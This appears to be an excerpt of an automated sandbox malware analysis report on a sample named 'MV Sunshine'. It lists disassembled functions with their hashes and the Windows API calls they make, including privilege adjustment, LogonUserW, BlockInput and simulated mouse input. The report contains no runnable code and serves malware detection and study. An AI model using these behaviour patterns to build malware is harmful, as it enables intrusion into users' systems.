SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0068B655

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: a8529d01cc9abec94d9327392e4e19c5088aedd60b47c55e0237e704d1cadc3b
Instruction ID: 9ab07dc85f5759b58eb328f0ef2998a67783abbf05d87d0610f675ee1c29bd77
Opcode Fuzzy Hash: a8529d01cc9abec94d9327392e4e19c5088aedd60b47c55e0237e704d1cadc3b
Instruction Fuzzy Hash: AC219035A00618EFCB00EFA5D881EADBBB9FF89310F0480A9E805AB351DB31A945CF55

Function 00678CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00640FF6: std::exception::exception.LIBCMT ref: 0064102C
Part of subcall function 00640FF6: __CxxThrowException@8.LIBCMT ref: 00641041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00678D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00678D3A
GetLastError.KERNEL32 ref: 00678D47

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 4f9376eae0731efb9a96d4975b540635bf2062a25fd6ebf6fd8bfaa216389cce
Instruction ID: ff584e7043d73de80b9ce62746fe858a8a4429202db3d0d1eacceddf20f236ad
Opcode Fuzzy Hash: 4f9376eae0731efb9a96d4975b540635bf2062a25fd6ebf6fd8bfaa216389cce
Instruction Fuzzy Hash: 761182B1414209AFE728EF64DC85D6BB7BEEF44711B10852EF45597241DB30BC418A64

Function 00684021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0068404B
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00684088
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00684091

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: a607be82088e7902060537c94925b3cf93544ef3898886d223614c0d0120f051
Instruction ID: 5fe8919d668dc3882b2d696828171f421a7e0f503c24c0c419810f0ae5fe0019
Opcode Fuzzy Hash: a607be82088e7902060537c94925b3cf93544ef3898886d223614c0d0120f051
Instruction Fuzzy Hash: 071186B1D00229BEE710EBE8DC44FAFBBBDEB09710F000656BA04E7190C6745D0547E1

Function 00684C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00684C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00684C43
FreeSid.ADVAPI32(?), ref: 00684C53

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 22efc697dd797eb4ea8c907821d7c49fae9a281ffd72cac6305375a69a442b0d
Instruction ID: 4add5b5fa732cf0c9ec5ec2efc59275e0801fb0bb0b8a977f5a55b3c7da7d24c
Opcode Fuzzy Hash: 22efc697dd797eb4ea8c907821d7c49fae9a281ffd72cac6305375a69a442b0d
Instruction Fuzzy Hash: 1DF04975A1130DBFDF04EFF0DC99AAEBBBDEF08201F0044A9A901E2281E6706A448B51

Function 00688B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00688B25

Part of subcall function 0064543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006891F8,00000000,?,?,?,?,006893A9,00000000,?), ref: 00645443
Part of subcall function 0064543A: __aulldiv.LIBCMT ref: 00645463

Strings

0un, xrefs: 00688B1C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0un
API String ID: 2893107130-594083182
Opcode ID: bbb403f9d7eea51e82d14c86b7a615713157a4f0473f58a45b1e7620928b95d2
Instruction ID: cdd2fe97890f66e66170747fe7e8d54155425eb216bc6b212a4950c81d838f64
Opcode Fuzzy Hash: bbb403f9d7eea51e82d14c86b7a615713157a4f0473f58a45b1e7620928b95d2
Instruction Fuzzy Hash: 4721A2726256108FC729CF25D441A92B3E2EBA5311B688F6CD1E5CF2D0CE74BD45CB94

Function 0062E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed872bce6143e18993e3afeef7a85c96fe22bbf1addef784a85b18829b2e7a1f
Instruction ID: 4da9631dd5d50af1f18b08d3e50d265e73db9f0eb588438d53fbf4640c2a753d
Opcode Fuzzy Hash: ed872bce6143e18993e3afeef7a85c96fe22bbf1addef784a85b18829b2e7a1f
Instruction Fuzzy Hash: 16229E74A00626CFDB24DF54E485AAEB7F2FF08300F148179E856AB341E736A985CF91

Function 0068C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0068C966
FindClose.KERNEL32(00000000), ref: 0068C996

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: e7060d9aaed8ba6c3202e4fc8b1f6a9512079da73110057b39e45af9051cc912
Instruction ID: 91fbac5ae4ce1fa7042d49ad8f9fdfe1e78f6408eaf3efd2d6497f17ae4c3726
Opcode Fuzzy Hash: e7060d9aaed8ba6c3202e4fc8b1f6a9512079da73110057b39e45af9051cc912
Instruction Fuzzy Hash: 0711A5316006109FDB10EF29D845A2AF7E6FF85320F00895EF8A9D7291DB30AC00CF95

Function 0068A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0069977D,?,006AFB84,?), ref: 0068A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0069977D,?,006AFB84,?), ref: 0068A314

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: b5f32df9a6804ddef0debd463e352b23329807059f0aad450398843fe04f175a
Instruction ID: cb1fc4407ed84f7748abacfc4b1f8e6e17a1682028b250f9e1cf8d1b91ce8eb7
Opcode Fuzzy Hash: b5f32df9a6804ddef0debd463e352b23329807059f0aad450398843fe04f175a
Instruction Fuzzy Hash: 12F0823554422DBBEB10AFE4CC48FEA776EBF09762F00426ABD08D6181D6309944CFE1

Function 00678713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00678851), ref: 00678728
CloseHandle.KERNEL32(?,?,00678851), ref: 0067873A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: c021994a05671410e3fe3b765837880437bf9322562af93160163f28629eed18
Instruction ID: c9ffd368d18b2838ae79ae1fa32de02596dd2a2dbd94e4da1cfcfdf28b32015f
Opcode Fuzzy Hash: c021994a05671410e3fe3b765837880437bf9322562af93160163f28629eed18
Instruction Fuzzy Hash: 48E0EC76010650EFEB652B60EC09D77BBEAEF05750724993DF49684470DB62ACD0DB50

Function 0064A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00648F97,?,?,?,00000001), ref: 0064A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0064A3A3

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b24af25b72076449e2fd8c1f451b728a956d4323268f5cacef8b6b492d247c47
Instruction ID: 5c85b47a9ca5b165b631710f4af02afe2340066ed290384afa5387285e4f0ed4
Opcode Fuzzy Hash: b24af25b72076449e2fd8c1f451b728a956d4323268f5cacef8b6b492d247c47
Instruction Fuzzy Hash: 6FB09231054208ABCF003BD1EC59B883F6AEB46AA2F405020F60D84060CFA264508ED2

Function 0064F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63008b15ba1aecddb184ce8883c4bf4e67c9e11081837e19bffc2b8bab8c42e6
Instruction ID: 527728fb85bc77a6f23567bd6c88dfe5a5ea450d1fc02d2f055a2292363fe23e
Opcode Fuzzy Hash: 63008b15ba1aecddb184ce8883c4bf4e67c9e11081837e19bffc2b8bab8c42e6
Instruction Fuzzy Hash: F0320661D69F414DD7239A34D872336A28AAFB73C4F15E737E819B5AA6EB29C4C34100

Function 0065267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a6796f2c6ef5f5173263e5ef29dbede143c0688f7cb9bd0078eac47621ad5c4
Instruction ID: b2e34f7a5f20aaf746769600f585e87c328fdeff188d8a135365c2b726a399fd
Opcode Fuzzy Hash: 1a6796f2c6ef5f5173263e5ef29dbede143c0688f7cb9bd0078eac47621ad5c4
Instruction Fuzzy Hash: A1B1BA70D2AF414DD72396398831336BA8DAFBB2C5F51E71BFC2674922EB2185C34241

Function 006941FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00694218

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: c6badf24650ca70dfa603b473a27348e3d68b08986ed6cfce47adf7433e660db
Instruction ID: 0b7d1c2335ff90ec607b3491c5e21c9879b06574ee9dceaea8675bae3d4854b3
Opcode Fuzzy Hash: c6badf24650ca70dfa603b473a27348e3d68b08986ed6cfce47adf7433e660db
Instruction Fuzzy Hash: B6E04F312406149FDB10EF5AE845E9AF7EEAF98760F00802AFC49C7752DA71E9418FA1

Function 00684EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00684F18

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 6c68284c96cfff2663245c11875f17d6956d21996fe1f0d06d7e0bda7bd6d249
Instruction ID: 496537a596ebbeb583c6776f7c086ea77f6b917d3216e696247d3eb176461ca2
Opcode Fuzzy Hash: 6c68284c96cfff2663245c11875f17d6956d21996fe1f0d06d7e0bda7bd6d249
Instruction Fuzzy Hash: 0FD05EF016420738FC187B20AC0FFB6110BF3C0781F845B8D3301855C1ADE56801A635

Function 00678C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006788D1), ref: 00678CB3

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: a160111d4390295db2277937de674a0e445223d3a9b6d0c1fa73d2d122585ac6
Instruction ID: 47a9b81596f014605f68be65e8699609b4d55a97aa46cd00c40cc4b43bcce695
Opcode Fuzzy Hash: a160111d4390295db2277937de674a0e445223d3a9b6d0c1fa73d2d122585ac6
Instruction Fuzzy Hash: 73D05E322A050EABEF019FA4DC01EAE3B6AEB04B01F408111FE15C50A1C775E835AF60

Function 00662230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00662242

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: d314e144aa22bf2e00de8a2ba1158ad967813c73277a79aea95a2206e93d7c5f
Instruction ID: a369a6b1ed7f8a76e2469b0fee12177ec63058149550e58bae63cb1d80932b75
Opcode Fuzzy Hash: d314e144aa22bf2e00de8a2ba1158ad967813c73277a79aea95a2206e93d7c5f
Instruction Fuzzy Hash: 28C048F1800109DBDB05EBA0DA98DEEB7BDAB09304F2440A6A142F2100E774AB448E72

Function 0064A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0064A36A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6d16c002c506000ceb37ec727f433fe47e4454512ee7840c44290adaaff0518b
Instruction ID: e300dd6a5b13f515c8a84b0e758eabf73ea11fd834e5986c6950148cfd82a771
Opcode Fuzzy Hash: 6d16c002c506000ceb37ec727f433fe47e4454512ee7840c44290adaaff0518b
Instruction Fuzzy Hash: CDA0113000020CAB8F002B82EC08888BFAEEA022A0B008020F80C800228F32A8208AC2

Function 00638A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7836dce13caca725d406847fe388fcfa0babeb9505be0b99f6ec9add04ee4b4e
Instruction ID: c26132b0b9f8676cd38e9bb27132cf4d3b4111e84bc958c273cf5f3e525b3beb
Opcode Fuzzy Hash: 7836dce13caca725d406847fe388fcfa0babeb9505be0b99f6ec9add04ee4b4e
Instruction Fuzzy Hash: 7F22D6309057568FDF288B14C4946FDB7B3FB41304F6484AAE4578B792EB749D82CBA1

Function 00642405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 512080266b007a102f1a7e182d96342824a42534abc291db7d7f38c334ad8934
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: A0C1A4322050530AEB5D4639D4341BEBAE26AA37B13AA075DF4B3CF6C5FF20D569D620

Function 0064283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 711ce4d88399cedcb8ede87d093e93f0ac3c5c7e7ab885a47e8bb418ae45ad84
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 97C1963220519309EB6D463A847407EBBE26B937B13AA075DF4B2DF6C4FF20D569D620

Function 00F64080 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118803858.0000000000F60000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: db479952f3ec4b84168e907c82281d9f8ec58bdf2c902dd53c2362914a178621
